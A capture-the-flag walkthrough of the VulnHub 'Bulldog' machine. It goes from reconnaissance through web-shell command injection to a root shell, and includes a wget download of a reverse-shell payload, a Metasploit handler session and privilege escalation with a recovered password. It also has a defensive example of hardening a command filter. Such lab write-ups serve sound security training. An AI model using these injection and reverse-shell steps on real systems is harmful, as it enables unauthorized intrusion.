Bulldog – VulnHub

In this CTF writeup I am going to walk you through “Bulldog”, a vulnerable machine designed for security enthusiasts to improve their vulnerability assessment and penetration testing skills.
You can download this machine from the VulnHub link provided.

1. Start with Nmap: nmap -sV 192.168.1.158


2. As we can see, port 23 is open. I tried telnet and netcat but had no luck. The banner in the output below shows that the service on this port is OpenSSH, not telnet.
root@kali:~# telnet 192.168.1.158 23
Trying 192.168.1.158...
Connected to 192.168.1.158.
Escape character is '^]'.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2

Protocol mismatch.
Connection closed by foreign host.


3. Run dirb against the host; it finds a few directories

root@kali:~# dirb http://192.168.1.158
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 22 04:29:57 2017
URL_BASE: http://192.168.1.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.158/ ----
==> DIRECTORY: http://192.168.1.158/admin/
==> DIRECTORY: http://192.168.1.158/dev/
+ http://192.168.1.158/robots.txt (CODE:200|SIZE:1071)
---- Entering directory: http://192.168.1.158/admin/ ----
==> DIRECTORY: http://192.168.1.158/admin/auth/
==> DIRECTORY: http://192.168.1.158/admin/login/
==> DIRECTORY: http://192.168.1.158/admin/logout/

---- Entering directory: http://192.168.1.158/dev/ ----
==> DIRECTORY: http://192.168.1.158/dev/shell/

---- Entering directory: http://192.168.1.158/admin/auth/ ----
==> DIRECTORY: http://192.168.1.158/admin/auth/group/
==> DIRECTORY: http://192.168.1.158/admin/auth/user/

---- Entering directory: http://192.168.1.158/admin/login/ ----

---- Entering directory: http://192.168.1.158/admin/logout/ ----

---- Entering directory: http://192.168.1.158/dev/shell/ ----

---- Entering directory: http://192.168.1.158/admin/auth/group/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')

---- Entering directory: http://192.168.1.158/admin/auth/user/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')

-----------------
END_TIME: Wed Nov 22 04:32:16 2017
DOWNLOADED: 32284 - FOUND: 1


4. Open the directories we got in dirb

http://192.168.1.158/dev/
http://192.168.1.158/dev/shell/
http://192.168.1.158/admin/

On viewing page source of http://192.168.1.158/dev/ we got


5. We Googled these hashes and got the password for nick/bulldog


6. Now log in to the admin page and open http://192.168.1.158/dev/shell/. The web shell only offers a limited set of commands,

but you can do command injection using the && operator.
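
Why the && operator gets past a "limited commands" filter, and how such a filter can be written so it does not, shown as an added example (not code from the Bulldog machine or the original post). The allow-list contents and all function names are assumptions.

```python
import shlex
import subprocess

# Assumed allow-list; the page only says the web shell permits "limited commands".
ALLOWED = {"ls", "pwd", "cat", "echo", "ifconfig"}
SHELL_META = set("&|;<>`$(){}\\\n")

def naive_is_allowed(command: str) -> bool:
    """Flawed check: inspects only the first word. If the whole string is then
    handed to a shell, '&&' is treated as a command separator."""
    words = command.split()
    return bool(words) and words[0] in ALLOWED

def parse_allowed(command: str):
    """Hardened check: reject shell metacharacters outright, tokenize the way a
    POSIX shell would, and return an argv list (None if rejected)."""
    if any(ch in SHELL_META for ch in command):
        return None
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    return argv

def run_allowed(command: str) -> str:
    """Execute the argv list without a shell, so no operator is interpreted."""
    argv = parse_allowed(command)
    if argv is None:
        raise ValueError("command rejected")
    done = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=5)
    return done.stdout

if __name__ == "__main__":
    # Constructed inputs for illustration.
    for cmd in ["ls -la", "ls && id", "echo hi; id", "cat 'notes.txt"]:
        print(f"{cmd!r:18} naive={naive_is_allowed(cmd)} "
              f"hardened={parse_allowed(cmd)}")
```

The hardened version still lets an allowed binary touch anything the web process can reach, so the service account's privileges and the arguments each command accepts need restricting as well.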


7. We will use wget to transfer the shell from Kali to the Bulldog machine

Create a reverse shell in Python using msfvenom.

Transfer it with wget by entering the following in the web shell: ls && wget http://192.168.1.6:3000/shell.py

Make sure you give shell.py execute permission.

Now set up a listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp_uuid
payload => python/meterpreter/reverse_tcp_uuid
msf exploit(handler) > set RHOST 192.168.1.158
RHOST => 192.168.1.158
msf exploit(handler) > set LPORT 7000
LPORT => 7000
msf exploit(handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.1.6:7000
[*] Starting the payload handler…
[*] Sending stage (40044 bytes) to 192.168.1.158
[*] Meterpreter session 1 opened (192.168.1.6:7000 -> 192.168.1.158:43296) at 2017-11-30 03:01:47 -0500


8. Now that we have a meterpreter session,
we will transfer linux privchecker

Go to

meterpreter > ls
Listing: /home/bulldogadmin/.hiddenadmindirectory

Take an interactive shell by typing shell in meterpreter.


9.

$ python -c 'import pty; pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
bash: /root/.bashrc: Permission denied
django@bulldog:/.hiddenAVDirectory$ sudo su -
sudo su -
Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTget
root@bulldog:~# id
id
uid=0(root) gid=0(root) groups=0(root)
